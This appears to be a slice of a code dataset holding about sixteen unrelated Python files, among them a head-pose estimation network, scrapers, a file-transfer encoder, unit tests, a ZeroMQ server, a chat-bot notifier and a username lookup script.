    def forward(self, x):
        # Shared MLP applied to both pooled descriptors, then summed.
        avg_out = self.fc(self.avg_pool(x))
        max_out = self.fc(self.max_pool(x))
        out = avg_out + max_out
        return self.sigmoid(out)
class SpatialAttention(nn.Module):
    """Spatial attention (CBAM style): channel-wise mean and max maps are
    stacked, convolved down to one channel and squashed with a sigmoid,
    yielding an (N, 1, H, W) attention map."""

    def __init__(self, kernel_size=7):
        super(SpatialAttention, self).__init__()
        # Same-padding so the attention map keeps the input's spatial size.
        self.conv1 = nn.Conv2d(2, 1, kernel_size,
                               padding=kernel_size // 2, bias=False)
        self.sigmoid = nn.Sigmoid()

    def forward(self, x):
        pooled = torch.cat(
            [x.mean(dim=1, keepdim=True), x.max(dim=1, keepdim=True).values],
            dim=1)
        return self.sigmoid(self.conv1(pooled))
class PYRModule(nn.Module):
    """Per-angle head: re-weights channels with ChannelAttention, then
    global-average-pools to a (N, C, 1, 1) feature map."""

    def __init__(self, inplanes, downsample=None):
        # NOTE(review): 'downsample' is accepted but never used -- confirm
        # whether it is a leftover from a residual variant.
        super(PYRModule, self).__init__()
        self.ca = ChannelAttention(inplanes)
        self.features = nn.Sequential(
            nn.AdaptiveAvgPool2d((1, 1)),
        )

    def forward(self, x):
        # Channel attention scales the input element-wise (no residual add;
        # the residual version is intentionally disabled).
        x = self.ca(x) * x
        x = self.features(x)
        return x
class HPNet(nn.Module):
    """Head-pose network: an EfficientNet-B4 backbone feeds three independent
    attention+pool heads (pitch, yaw, roll). Each head produces 66-bin
    classification logits; the final angle is the softmax expectation over
    the bin indices. Requires CUDA (idx_tensor/softmax/sigmoid are .cuda())."""

    def __init__(self):
        super(HPNet, self).__init__()
        self.faceModel = efn.from_pretrained('efficientnet-b4')
        # Backbone feature width for B4; the trailing alternatives are the
        # widths of other EfficientNet variants.
        self.planes_num = 1792  # 2304/2048/1536/1408/1280 for other backbones
        self.cls_num = 66       # number of angle bins per head
        self.feature_1 = PYRModule(self.planes_num)
        self.feature_2 = PYRModule(self.planes_num)
        self.feature_3 = PYRModule(self.planes_num)
        # Bin-index vector used for the softmax expectation.
        # NOTE(review): torch.range is deprecated and INCLUDES the endpoint
        # (0..65 here, which is what cls_num=66 bins need); torch.arange(0, 66)
        # would be the modern equivalent -- confirm before changing.
        self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1) * 1).cuda()
        self.fc_b_1 = nn.Sequential(
            nn.Linear(self.planes_num, self.cls_num),
        )
        self.fc_b_2 = nn.Sequential(
            nn.Linear(self.planes_num, self.cls_num),
        )
        self.fc_b_3 = nn.Sequential(
            nn.Linear(self.planes_num, self.cls_num),
        )
        # Max-pool over logits (window 3) -- auxiliary coarse-bin outputs.
        self.max_pool_1 = nn.MaxPool1d(3)
        self.max_pool_2 = nn.MaxPool1d(3)
        self.max_pool_3 = nn.MaxPool1d(3)
        self.softmax = nn.Softmax(dim=2).cuda()
        self.sigmoid = nn.Sigmoid().cuda()

    def forward(self, faces):
        """Return (angles, logits, max-pooled logits, head features).

        angles: (N, 3) expected pitch/yaw/roll bin values;
        logits: (N, 3, 66); pooled: (N, 3, 22); features: (N, 3, planes_num).
        """
        xFace = self.faceModel.extract_features(faces)
        # One attention+pool head per angle.
        x_p = self.feature_1(xFace)
        x_y = self.feature_2(xFace)
        x_r = self.feature_3(xFace)
        x_p = torch.flatten(x_p, 1)
        x_y = torch.flatten(x_y, 1)
        x_r = torch.flatten(x_r, 1)
        # Stack per-head features along a new "angle" dimension.
        x_p_feat = torch.unsqueeze(x_p, 1)
        x_y_feat = torch.unsqueeze(x_y, 1)
        x_r_feat = torch.unsqueeze(x_r, 1)
        x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)
        # Per-head bin logits.
        x_p_b = self.fc_b_1(x_p)
        x_y_b = self.fc_b_2(x_y)
        x_r_b = self.fc_b_3(x_r)
        x_p_b = torch.unsqueeze(x_p_b, 1)
        x_y_b = torch.unsqueeze(x_y_b, 1)
        x_r_b = torch.unsqueeze(x_r_b, 1)
        x_p_b_mp = self.max_pool_1(x_p_b)
        x_y_b_mp = self.max_pool_2(x_y_b)
        x_r_b_mp = self.max_pool_3(x_r_b)
        # Softmax expectation over bin indices -> continuous bin value.
        x_p_pre = self.softmax(x_p_b)
        x_y_pre = self.softmax(x_y_b)
        x_r_pre = self.softmax(x_r_b)
        x_p = torch.sum(x_p_pre * self.idx_tensor, 2)
        x_y = torch.sum(x_y_pre * self.idx_tensor, 2)
        x_r = torch.sum(x_r_pre * self.idx_tensor, 2)
        return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b, x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat
4,309 | e1913c80375e4871119182d0267e9f228818624f | # Obtener en otra lista unicamente números impares:
# Collect the odd numbers into one list and the even numbers into another,
# demonstrating two equivalent approaches (filter vs. comprehension).
my_list = [1, 4, 5, 6, 9, 13, 19, 21]

# Odd values via filter + lambda:
lista_impares = list(filter(lambda n: n % 2 != 0, my_list))
print(my_list)
print(lista_impares)
print('')

# Even values via a list comprehension:
lista_pares = [n for n in my_list if n % 2 == 0]
print(my_list)
print(lista_pares)
|
4,310 | 234aad868ea71bbe476b303bcff37221820f1d90 | import os
import time
import json
import click
import click_log
import logging
from flightsio.scraper import FlightScraper
logger = logging.getLogger(__name__)
click_log.basic_config(logger)
@click.group()
def main():
    """
    An empty click group, required in order to bundle the other commands.
    """
    # Subcommands (destinations / all-routes / routes) attach themselves via
    # the @main.command decorators below.
    pass
@main.command(help="""Reads the entire destination list of of the given airport
returns the name of the airport and url associated with it.
Sample usage: fio destinations --from-airport PHX""")
@click.option('--from-airport', '-a', help='The three letter code of the source airport. I.e. PHX')
@click_log.simple_verbosity_option(logger)
def destinations(from_airport):
    # Print the destination map for one airport as pretty JSON.
    if not from_airport:
        logger.error('Unable to get destinations without an aiport code. Use fio destinations --help')
        return
    destinations = FlightScraper().get_destinations(from_airport.upper())
    logger.info(json.dumps(destinations, indent=4))
@main.command(help="""Reads the entire destination list of of the given airport and crawls
each destination to obtain the list of routes. The output files will
stored in the given folder. Sample usage:
fio all-routes --from-airport PHX --output ./out
""")
@click.option('--from-airport', '-a', help='The three letter code of the source airport. I.e. PHX')
@click.option('--output', '-o', help='The path used to write the parsed routes.', default='./output')
@click_log.simple_verbosity_option(logger)
def all_routes(from_airport, output):
    # Crawl every destination reachable from the airport and write one CSV
    # per destination under <output>/<AIRPORT>/.
    if not from_airport:
        logger.error('Unable to get all routes without an aiport code. Use fio all_routes --help')
        return
    airport = from_airport.upper()
    scraper = FlightScraper()
    airport_path = os.path.join(output, airport)
    logger.info(f'Creating {airport_path}')
    os.makedirs(airport_path, exist_ok=True)
    # get_routes yields (destination_name, route_rows) pairs lazily.
    for destination, routes in scraper.get_routes(airport):
        write_csv(airport_path, destination, routes)
@main.command(help="""Reads the route list between a source airport and a destination airport and
writes the result in the output folder. Sample usage:
fio routes --from-airport PHX --to-airport OKC --output ./out
""")
@click.option('--from-airport', '-a', help='The three letter code of the source airport. I.e. PHX')
@click.option('--to-airport', '-b', help='The three letter code of the destination airport. I.e. OKC')
@click.option('--output', '-o', help='The path used to write the parsed routes.', default='./output')
@click_log.simple_verbosity_option(logger)
def routes(from_airport, to_airport, output):
    # Scrape the routes between one airport pair into
    # <output>/single_routes/<FROM>_<TO>.csv.
    if not from_airport or not to_airport:
        logger.error('Unable to get routes without aiport codes. Use fio routes --help')
        return
    airport = from_airport.upper()
    scraper = FlightScraper()
    route_path = os.path.join(output, 'single_routes')
    logger.info(f'Creating {route_path}')
    os.makedirs(route_path, exist_ok=True)
    destination_link = scraper.get_fm_link(from_airport, to_airport)
    # NOTE(review): 'get_flight_foutes' mirrors the scraper's actual method
    # name (apparent typo for 'routes'); 'name' is returned but unused here.
    name, routes = scraper.get_flight_foutes(to_airport, destination_link)
    write_csv(route_path, f'{from_airport}_{to_airport}', routes)
def write_csv(path, destination, routes):
    """Write route dicts to <path>/<destination>.csv.

    The header comes from the first route's keys; embedded commas in values
    are replaced with spaces (deliberately simple, no quoting).

    :param routes: list of dicts sharing the same keys; nothing is written
        when empty.
    """
    if not routes:  # idiomatic emptiness check (was 'if not len(routes)')
        print(f'{destination} has no routes. Nothing to write.')
        return
    header = ','.join(routes[0])
    with open(os.path.join(path, f'{destination}.csv'), 'w') as f:
        f.write(header + '\n')
        for route in routes:
            row = ','.join(v.strip().replace(',', ' ') for v in route.values())
            f.write(row + '\n')
def write_json(destination_path, flight, routes):
    # Dump routes as pretty JSON to <destination_path>/<flight>.json.
    # NOTE(review): currently unreferenced by any command -- kept as an
    # alternative output format.
    with open(os.path.join(destination_path, f'{flight}.json'), 'w') as f:
        f.write(json.dumps(routes, indent=4))

if __name__ == '__main__':
    main()
|
4,311 | f1021bfbf11886a01a84033b880d648c3286856b | # -*- coding: utf-8 -*-
#!/usr/bin/env python
from subprocess import call
def query_DB_satellites(outputpath="../data/", user="anonimo", passwd="secreto"):
    """
    Queries the multidark database to extract all the haloes in the box within a ID range.
    The output is stored as an ascii (CSV) file.

    Python 2 script. Selects Bolshoi BDMW sub-haloes (snapnum=416) whose host
    is a Milky-Way-mass halo (5e11 < Mvir < 6e11) and saves the CSV via wget.
    """
    #define the output file
    outputfile=outputpath+"milky_way_satellites.csv"
    # Build the SQL query
    query = "with milky_way_halos as (select * from Bolshoi..BDMW where snapnum=416 and Mvir > 5.0E11 and Mvir < 6.0E11 ) select sub.* from milky_way_halos mwh, Bolshoi..BDMW sub where sub.snapnum = 416 and sub.hostFlag = mwh.bdmId"
    # Build the wget command to query the database
    website = "http://wget.multidark.org/MyDB?action=doQuery&SQL="
    username = user
    password = passwd
    # Cookie options keep the MyDB session alive across the redirect.
    wget_options=" --content-disposition --cookies=on --keep-session-cookies --save-cookies=cookie.txt --load-cookies=cookie.txt --auth-no-challenge"
    wget_options=wget_options+" -O "+outputfile +" "
    wget_command="wget --http-user="+username+" --http-passwd="+password+" "+wget_options
    command=wget_command + "\""+ website + query+"\""
    # NOTE(review): the password is embedded in the command line (visible in
    # the process list) and the string is run with shell=True -- treat the
    # credentials and inputs as trusted-only, or switch to subprocess with an
    # argument list.
    print ""
    print query
    print ""
    print command
    print ""
    # execute wget in shell
    retcode = call(command,shell=True)

# Module-level invocation with placeholder credentials.
query_DB_satellites(user="x", passwd="x")
4,312 | 47c5375816ab35e8225e5f3695f7ee2ab5336076 | DEFAULT_SIZE = 512
class DataEncoding:
    """Encode/decode file-transfer segments.

    Wire format (big-endian): 4-byte ack number | 1-byte type
    (0x01=START carries the file name, 0x02=DATA, 0x03=END) |
    2-byte payload length | payload.
    """

    @staticmethod
    def segment_decode(segment):
        """Parse a raw segment into {'ack', 'tip', 'len', 'data'}."""
        arr = bytearray(segment)
        ack = int.from_bytes(arr[:4], byteorder='big', signed=False)
        tip = int.from_bytes(arr[4:5], byteorder='big', signed=False)
        length = int.from_bytes(arr[5:7], byteorder='big', signed=False)
        # The length field bounds the payload, so END-segment zero padding is
        # excluded automatically. (The old per-byte filter `arr[i] != b'\x00'`
        # compared an int to bytes -- always True -- so it was a no-op and has
        # been dropped; stripping real zero bytes would corrupt binary data.)
        data = arr[7:7 + length]
        return {'ack': ack, 'tip': tip, 'len': length, 'data': data}

    # codificare: (segment_number, segment_type, segment_len), segment_data
    @staticmethod
    def encode_start(transmitter, nume_fisier):
        """Build the START segment (type 0x01) carrying the file name."""
        transmitter.ack = transmitter.ack + 1  # first ack sent is 1
        segment_number = transmitter.ack.to_bytes(4, byteorder='big', signed=False)
        segment_type = b'\x01'
        segment_len = len(nume_fisier).to_bytes(2, byteorder='big', signed=False)
        segment = segment_number + segment_type + segment_len
        for ch in nume_fisier:
            segment += ord(ch).to_bytes(1, byteorder='big', signed=False)
        return segment

    @staticmethod
    def encode_data(transmitter, segment_data):
        """Build a full DATA segment (type 0x02, length = DEFAULT_SIZE)."""
        transmitter.ack = transmitter.ack + 1
        segment_number = transmitter.ack.to_bytes(4, byteorder='big', signed=False)
        segment_type = b'\x02'
        segment_len = DEFAULT_SIZE.to_bytes(2, byteorder='big', signed=False)
        return segment_number + segment_type + segment_len + segment_data

    @staticmethod
    def encode_end(transmitter, segment_data):
        """Build the END segment (type 0x03): the payload is zero-padded to
        DEFAULT_SIZE while the length field holds the useful byte count."""
        # (Removed a stray 'global end_transmission' -- the name was never
        # defined or used.)
        transmitter.ack = transmitter.ack + 1
        segment_number = transmitter.ack.to_bytes(4, byteorder='big', signed=False)
        segment_type = b'\x03'
        useful_len = len(segment_data)
        segment_data = segment_data + b'\x00' * (DEFAULT_SIZE - useful_len)
        segment_len = useful_len.to_bytes(2, byteorder='big', signed=False)
        return segment_number + segment_type + segment_len + segment_data

    @staticmethod
    def encode_error(transmitter, segment_data):
        """Fallback for unknown segment types; intentionally a no-op."""
        pass

    @staticmethod
    def encode(transmitter, tip, data):
        """Dispatch to the encoder for *tip* ('START' | 'DATA' | 'END')."""
        segment_type = {
            'START': DataEncoding.encode_start,
            'DATA': DataEncoding.encode_data,
            'END': DataEncoding.encode_end
        }
        return segment_type.get(tip, DataEncoding.encode_error)(transmitter, data)

    # citirea fisier ca pachete de octeti
    @staticmethod
    def bytes_from_file(transmitter, chunk_size=None):
        """Yield transmitter.filepath's contents in chunk_size-byte chunks
        (default DEFAULT_SIZE, resolved lazily at call time)."""
        if chunk_size is None:
            chunk_size = DEFAULT_SIZE
        with open(transmitter.filepath, "rb") as f:
            while True:
                chunk = f.read(chunk_size)
                if not chunk:
                    break
                yield chunk

    # codificarea pachetelor de octeti
    @staticmethod
    def encode_bytes(transmitter):
        """Yield DATA segments for each full chunk and an END segment for the
        final short chunk.

        NOTE(review): a file whose size is an exact multiple of DEFAULT_SIZE
        yields no END segment -- confirm how the receiver terminates then.
        """
        # Fix: previously passed transmitter.filepath where bytes_from_file
        # expects the transmitter object itself, crashing on '.filepath'.
        for b in DataEncoding.bytes_from_file(transmitter):
            if len(b) == DEFAULT_SIZE:
                yield DataEncoding.encode(transmitter, 'DATA', b)
            else:
                yield DataEncoding.encode(transmitter, 'END', b)
4,313 | 71b78b1347456420c3fc29605887d20ba5bff06e | from zeus import auth, factories
from zeus.constants import Result, Status
from zeus.models import FailureReason
from zeus.tasks import aggregate_build_stats_for_job
def test_unfinished_job(mocker, db_session, default_source):
    """A still-running job leaves its build in_progress with result unknown."""
    tenant = auth.Tenant(repository_ids=[default_source.repository_id])
    auth.set_current_tenant(tenant)
    build = factories.BuildFactory(source=default_source, queued=True)
    db_session.add(build)
    job = factories.JobFactory(build=build, in_progress=True)
    db_session.add(job)
    aggregate_build_stats_for_job(job.id)
    assert build.status == Status.in_progress
    assert build.result == Result.unknown
def test_finished_job(mocker, db_session, default_source):
    """A failed job marks its build finished with result failed."""
    tenant = auth.Tenant(repository_ids=[default_source.repository_id])
    auth.set_current_tenant(tenant)
    build = factories.BuildFactory(source=default_source, in_progress=True)
    db_session.add(build)
    job = factories.JobFactory(build=build, failed=True)
    db_session.add(job)
    aggregate_build_stats_for_job(job.id)
    assert (build.status, build.result) == (Status.finished, Result.failed)
def test_failing_tests(mocker, db_session, default_source):
    """A passed job is demoted to failed when one of its test cases failed,
    and a failing_tests FailureReason row is recorded."""
    tenant = auth.Tenant(repository_ids=[default_source.repository_id])
    auth.set_current_tenant(tenant)
    build = factories.BuildFactory(source=default_source, in_progress=True)
    db_session.add(build)
    job = factories.JobFactory(build=build, passed=True)
    db_session.add(job)
    factories.TestCaseFactory(job=job, failed=True)
    aggregate_build_stats_for_job(job.id)
    assert job.result == Result.failed
    reasons = list(FailureReason.query.filter(FailureReason.job_id == job.id))
    assert len(reasons) == 1
    assert reasons[0].reason == FailureReason.Code.failing_tests
|
4,314 | d959ed49a83fb63e0bce31b5c81c013f0986706b | #!/usr/bin/python
# Developed by Hector Cobos
import sys
import csv
import datetime
def mapper():
    """Map step: emit "author_id<TAB>hour" for each valid row read on stdin.

    Input is a tab-separated file with a header row; column 4 holds the
    author id and column 9 a "date time" timestamp whose hour is extracted.
    Python 2 code (print statement, reader.next()).
    """
    # Using a reader in order to read the whole file
    reader = csv.reader(sys.stdin, delimiter='\t')
    # Jump to the next line. We want to avoid the line with the name of the fields
    reader.next()
    # loop
    for line in reader:
        # Checking no. of fields are correct
        if len(line) == 19:
            author_id=line[3]
            date=line[8]
            # Split "date time", then "HH:MM:SS"; hour[0] is the hour.
            # NOTE(review): assumes the timestamp always contains a space
            # followed by a colon-separated time -- confirm upstream format.
            time = date.strip().split(" ")
            hour = time[1].strip().split(":")
            print "{0}\t{1}".format(author_id, hour[0])
mapper()
|
4,315 | ccba923fa4b07ca9c87c57797e1e6c7da3a71183 | import time #melakukan import library time
import zmq #import the ZeroMQ library
context = zmq.Context() #create the ZeroMQ context in the variable context
socket = context.socket(zmq.REP) #create a REP (reply) socket from the context
socket.bind("tcp://10.20.32.221:5555") #bind the socket to TCP port 5555
while True: #loop forever serving requests
    message = socket.recv() #store the request received by the socket in message
    print("Received request: %s" % message) #print the received request
    # do some work
    time.sleep(1) #pause to simulate doing some processing before replying
    socket.send(b"World") #send the byte-string reply 'World' through the socket
|
4,316 | 36e538ca7fbdbf6e2e6ca1ae126e4e75940bb5cd | def check_orthogonal(u, v):
return u.dot(v) == 0
def check_p():
    """Return True iff the caller's local scope contains no text matching
    the pattern 'p = 0' (checked against the repr of the caller's locals)."""
    import inspect
    import re
    caller_locals = inspect.currentframe().f_back.f_locals
    matches = re.findall(r"p\s*=\s*0", str(caller_locals))
    return len(matches) == 0
|
4,317 | c27c29a5b4be9f710e4036f7f73a89c7d20acea5 | class String:
def reverse(self,s):
        """Return *s* with its characters in reverse order."""
        return ''.join(reversed(s))
# Read a line from stdin and build the helper used to reverse it below.
s=input()
obj1=String()
print(obj1.reverse(s)) |
4,318 | 6c8180d24110045348d9c2041c0cca26fa9ea2d2 | # OSINT By FajarTheGGman For Google Code-in 2019©
import urllib3 as url
class GCI:
    """Check whether a username exists on a few social-media sites by
    requesting https://<site>/<user> and inspecting the HTTP status."""
    def banner():
        print("[---- OSINT By FajarTheGGman ----]\n")
    def main():
        user = str(input("[!] Input Name Victim ? "))
        init = url.PoolManager()
        a = init.request("GET", "https://facebook.com/" + user)
        b = init.request("GET", "https://instagram.com/" + user)
        c = init.request("GET", "https://twitter.com/" + user)
        if a.status == 200:
            print("[+] " + user + " => Found In Facebook")
        else:
            print("[-] " + user + " => NotFound in Facebook")
        if b.status == 200:
            print("[+] " + user + " => Found In Instagram")
        else:
            print("[-] " + user + " => NotFound in Instagram")
        # BUG FIX: the original re-checked b.status (Instagram) here, so the
        # Twitter verdict was never based on the Twitter response.
        if c.status == 200:
            print("[+] " + user + " => Found In Twitter")
        else:
            print("[-] " + user + " => NotFound in Twitter")
# GCI's methods take no self, so they are invoked directly on the class object.
x = GCI
x.banner()
x.main() |
4,319 | 8bf75bf3b16296c36c34e8c4c50149259d792af7 | import sys
try:
myfile = open("mydata.txt",encoding ="utf-8")
except FileNotFoundError as ex:
print("file is not found")
print(ex.args)
else:
print("file :",myfile.read())
myfile.close()
finally :
print("finished working")
|
4,320 | 77f37a80d160e42bb74017a55aa9d06b4c8d4fee | # !/usr/bin/python
# coding:utf-8
import requests
from bs4 import BeautifulSoup
import re
from datetime import datetime
#紀錄檔PATH(建議絕對位置)
log_path='./log.txt'
#登入聯絡簿的個資
sid=''#學號(Ex. 10731187)
cid=''#生份證號(Ex. A123456789)
bir=''#生日(Ex. 2000/1/1)
#line or telegram module
#platform='telegram'
platform='line'
if platform=='line':
from linebot import LineBotApi
from linebot.models import TextSendMessage
#line api token
bottoken=''
#line chat id
chatid=''
line_bot_api = LineBotApi(bottoken)
if platform=='telegram':
#telegram bot token
bottoken=''
#telegram group chat id
chatid=''
#課表
cls=[['學校活動','英文','化學','國文','地理','生物','公民','歷史','數學'],
['彈性課程','地科','數學','數學','資訊','西洋影視','國文','國文','英文'],
['數學','物理','生活科技','體育','國文','化學','音樂','英文','英文'],
['數學','論孟選讀','生物','多元選修','歷史','化學','英文','國防','物理'],
['彈性課程','英文','數學','地理','公民','國文','體育','物理','社團'],[],[]]
def open_log():
    """Open the sent-post log, setting globals `log` (already-posted subjects)
    and `fw` (append-mode handle used to record newly posted subjects)."""
    global log
    global fw
    try:
        fr = open(log_path, "r")
        log=fr.read().split('\n')
        fr.close()
    except:
        # First run: the log file does not exist yet, so create it.
        # NOTE(review): the bare except also hides other I/O errors.
        fw = open(log_path, "w+")
        log=''
        return
    fw = open(log_path, "a")
    return
def login_homework():
    """Log in to the school contact-book site as student/parent and store the
    resulting ASP.NET session id in the global `cook`."""
    res = requests.get('http://www.yphs.tp.edu.tw/tea/tu2.aspx')
    soup = BeautifulSoup(res.text, "lxml")
    # Hidden ASP.NET form-state fields required for the login POST.
    VIEWSTATE=soup.find(id="__VIEWSTATE")
    VIEWSTATEGENERATOR=soup.find(id="__VIEWSTATEGENERATOR")
    EVENTVALIDATION=soup.find(id="__EVENTVALIDATION")
    res=requests.post('http://www.yphs.tp.edu.tw/tea/tu2.aspx', allow_redirects=False, data = {'__VIEWSTATE':VIEWSTATE.get('value'),'__VIEWSTATEGENERATOR':VIEWSTATEGENERATOR.get('value'),'__EVENTVALIDATION':EVENTVALIDATION.get('value'),'chk_id':'學生/家長','tbx_sno':sid,'tbx_sid':cid,'tbx_sbir':bir,'but_login_stud':'登 入'})
    global cook
    cook=res.cookies['ASP.NET_SessionId']
    return
def crawl_and_fetch_today_homework(tomorrow_calendar,tomorrow_class_table):
    """Scan the first bulletin page and post any entries not yet in the log.

    Contact-book entries ('聯絡簿') additionally get tomorrow's calendar and
    class table appended on Mon-Thu; on Friday they are sent unchanged.
    """
    send = requests.get('http://www.yphs.tp.edu.tw/tea/tu2-1.aspx',cookies={'ASP.NET_SessionId':cook})
    soup = BeautifulSoup(send.text, "lxml")
    # Hidden ASP.NET form state needed for the per-post "details" POST.
    VIEWSTATE=soup.find(id="__VIEWSTATE")
    VIEWSTATEGENERATOR=soup.find(id="__VIEWSTATEGENERATOR")
    EVENTVALIDATION=soup.find(id="__EVENTVALIDATION")
    for x in range(15,1,-1):# posts 1..15 on the first page
        try:# some pages have fewer than 15 posts; just skip the missing ones
            # zero-pad the post index used in the ASP.NET control name
            num=str('')
            if(x<10):
                num='0'+str(x)
            else:
                num=str(x)
            # fetch the detail page of this post
            send = requests.post('http://www.yphs.tp.edu.tw/tea/tu2-1.aspx',cookies={'ASP.NET_SessionId':cook}, data = {'__VIEWSTATE':VIEWSTATE.get('value'),'__VIEWSTATEGENERATOR':VIEWSTATEGENERATOR.get('value'),'__EVENTVALIDATION':EVENTVALIDATION.get('value'),('GridViewS$ctl'+num+'$but_vf1'):'詳細內容'})
            soup = BeautifulSoup(send.text, "lxml")
            # skip posts whose subject is already recorded in the log
            ok=bool(True)
            for y in range(0,len(log),1):
                if soup.find(id='Lab_purport').text==log[y]:
                    ok=bool(False)
            if ok==True:# not posted yet
                fw.write(soup.find(id='Lab_purport').text+'\n')
                post_title=str('[主旨:'+str(soup.find(id='Lab_purport').text)+']')
                post_content=str(soup.find(id='Lab_content').text)
                post_attachment=str(' ')
                if(soup.find(target='_blank')):
                    post_attachment=soup.find(target='_blank').get('href')
                send_word=post_title+'\n'+post_content+'\n'+post_attachment
                if(str(soup.find(id='Lab_purport').text).find('聯絡簿')>=0 and datetime.today().weekday()<4):
                    send_word=send_word+'\n***系統訊息***\n'+tomorrow_calendar+'\n'+tomorrow_class_table
                if(str(soup.find(id='Lab_purport').text).find('聯絡簿')>=0 and datetime.today().weekday() == 4 ):
                    send_word=send_word
                post(send_word)
        except:
            pass
    return
def crawl_tomorrow_calendar():
    """Scrape tomorrow's school calendar (whole school + grade 10) and return
    it as a formatted message string."""
    res = requests.get('http://www.yphs.tp.edu.tw/yphs/gr2.aspx')
    soup = BeautifulSoup(res.text, "lxml")
    # NOTE(review): indexes 16 (whole school) and 21 (grade 10) depend on the
    # page layout -- verify if the site changes.
    calendar='明日行事曆:\n 全校:'+soup.find_all(color="#404040")[16].text
    if(soup.find_all(color="#404040")[16].text==' '):
        calendar+='N/A'
    calendar=calendar+'\n 高一:'+soup.find_all(color="#404040")[21].text
    if(soup.find_all(color="#404040")[21].text==' '):
        calendar+='N/A'
    return calendar
def fetch_tomorrow_class_table():
    """Format tomorrow's timetable from `cls`, split into morning (first 4
    periods) and afternoon, with '->' between consecutive subjects."""
    result = '\n明日課表:\n 早上:\n '
    tomorrow = (datetime.today().weekday() + 1) % 7
    for idx, subject in enumerate(cls[tomorrow]):
        if idx == 4:
            result += '\n 下午:\n '
        result += '[' + subject + ']'
        # no arrow after the last morning period or the final period
        if idx < 8 and idx != 3:
            result += '->'
    return result
def post(send_word):
    """Send `send_word` through the configured platform (LINE or Telegram)."""
    if platform=='line':
        line_bot_api.push_message(chatid,TextSendMessage(text=send_word,wrap=True))
    if platform=='telegram':
        # NOTE(review): send_word is not URL-encoded; special characters may
        # break the Telegram request.
        requests.get("https://api.telegram.org/bot"+bottoken+"/sendMessage?chat_id="+chatid+"&text="+send_word)
'''
!!!contact ab0897867564534231@gmail.com for this function!!!
def crawl_message_board():
res = requests.get('http://59.120.227.144:11300/line/api.php')
soup = BeautifulSoup(res.text, "lxml")
message_board = soup.find_all('td')
message='\n\n留言板( http://59.120.227.144:11300/line/ ) : \n'
for i in range(0,len(message_board),3):
message=message+'第'+str(int((i/3)+1))+'則:\n-'+message_board[i+1].text+"\n--來自:"+message_board[i+2].text+'\n'
return message
'''
def close_log():
    """Close the append-mode log handle opened by open_log()."""
    fw.close()
def main():
    """One polling pass: read the log, log in, post new items, close the log."""
    open_log()
    login_homework()
    crawl_and_fetch_today_homework(crawl_tomorrow_calendar(),fetch_tomorrow_class_table())
    close_log()
# On Sunday between 21:00 and 21:09, remind that school resumes tomorrow.
if(datetime.today().weekday()==6 and datetime.today().hour == 21 and datetime.today().minute<10):
    send_word='[主旨:機器人訊息]\n***系統訊息***\n'+crawl_tomorrow_calendar()+'\n'+fetch_tomorrow_class_table()
    post(send_word)
main() |
4,321 | 68d9f77f91a13c73373c323ef0edbe18af9990a3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from celery import Celery
# Celery application: task modules live in 'task.tasks'; broker/backend
# settings are loaded from the 'task.config' module.
app = Celery('task', include=['task.tasks'])
app.config_from_object('task.config')
if __name__ == '__main__':
    # Start a worker when this file is executed directly.
    app.start()
|
4,322 | c64e41609a19a20f59446399a2e864ff8834c3f0 | import tty
import sys
import termios
def init():
    """Switch stdin to cbreak mode and return the previous terminal settings.

    The caller must pass the returned settings to exit() to restore the
    terminal on shutdown.
    """
    orig_settings = termios.tcgetattr(sys.stdin)
    tty.setcbreak(sys.stdin)
    return orig_settings
def get_input():
    """Read and return a single character from stdin (no Enter needed while
    the terminal is in cbreak mode)."""
    return sys.stdin.read(1)
def exit(orig_settings):
    """Restore the terminal settings saved by init().

    NOTE(review): this shadows the builtin exit(); consider renaming.
    """
    termios.tcsetattr(sys.stdin, termios.TCSADRAIN, orig_settings)
if __name__ == "__main__":
    # Echo each keypress (quoted) until Esc (chr 27) is pressed.
    settings = init()
    key = 0
    while key != chr(27): # esc
        key = get_input()
        print("'" + str(key) + "'")
exit(settings) |
4,323 | 598c634aac1df951f544127e102a1e2d61cac0b0 | #!/usr/bin/env python
from time import sleep
from org.mustadroid.python.interleech import processPage
import MySQLdb
from org.mustadroid.python.interleech.item import Item
import re
import time
if __name__ == "__main__":
    # Open the MySQL database that lists the pages to scrape (Python 2 code).
    db = MySQLdb.connect(host = "localhost",
                         user = "interleech",
                         passwd = "abc123",
                         db = "interleech")
    cur = db.cursor()
    sqlQuery = "SELECT * FROM interleech ORDER by id ASC"
    # Poll the job table forever, reprocessing every configured page each pass.
    while True:
        cur.execute(sqlQuery)
        results = cur.fetchall()
        print results
        # NOTE(review): 'rows' is assigned but never used below; the loop
        # iterates over 'results' instead -- confirm which was intended.
        rows = [results[5]]
        for row in results:
            print "\n################## PROCESSING " + row[1] + " #######################\n"
            # Reset the module-level state that processPage accumulates per run.
            processPage.attrList = set()
            processPage.dbHintsDict = dict()
            processPage.tableName = row[1]
            processPage.abortProcessing = False
            # Base URLs derived from the stored XML/page addresses.
            processPage.xmlBase = re.compile('(.*)/(.*)').search(row[3]).group(1) + "/"
            processPage.base = re.compile('(.*).se/(.*)').search(row[2]).group(1) + ".se"
            processPage.timeStamp = int(time.time() * 100)
            itemList = []
            processPage.processPage(row[2], row[3], itemList, Item)
            Item.CreateTable(processPage.tableName, processPage.attrList, processPage.dbHintsDict)
            # Save items with descending timestamps so scrape order is preserved.
            i = 0
            for item in itemList:
                if item.id is not None:
                    item.Save(processPage.tableName, processPage.attrList, processPage.timeStamp - i)
                i += 1
            print "\n################### FINISHED PROCESSING #######################\n"
        sleep(60)
    # NOTE(review): unreachable -- the while True loop above never exits.
    db.close()
|
4,324 | a5c9ff1fe250310216e2eaa7a6ff5cc76fc10f94 | import docker
import logging
import sys
if __name__ == '__main__':
    # setting up logger
    logging.basicConfig(stream=sys.stdout,
                        format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',
                        level=logging.DEBUG)
    # get the docker client
    client = docker.from_env()
    # list out docker volumes
    logging.info(str([x.name for x in client.volumes.list()]))
    # Check if airflow backend volume is created or not
    # if the volume is not created then create it
    if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]:
        client.volumes.create('airflow_pg_data')
    # kill container if it is already running
    # NOTE(review): despite the comment above, nothing is killed here -- the
    # branch below only starts the container when it is NOT already running.
    logging.info(str([x.name for x in client.containers.list()]))
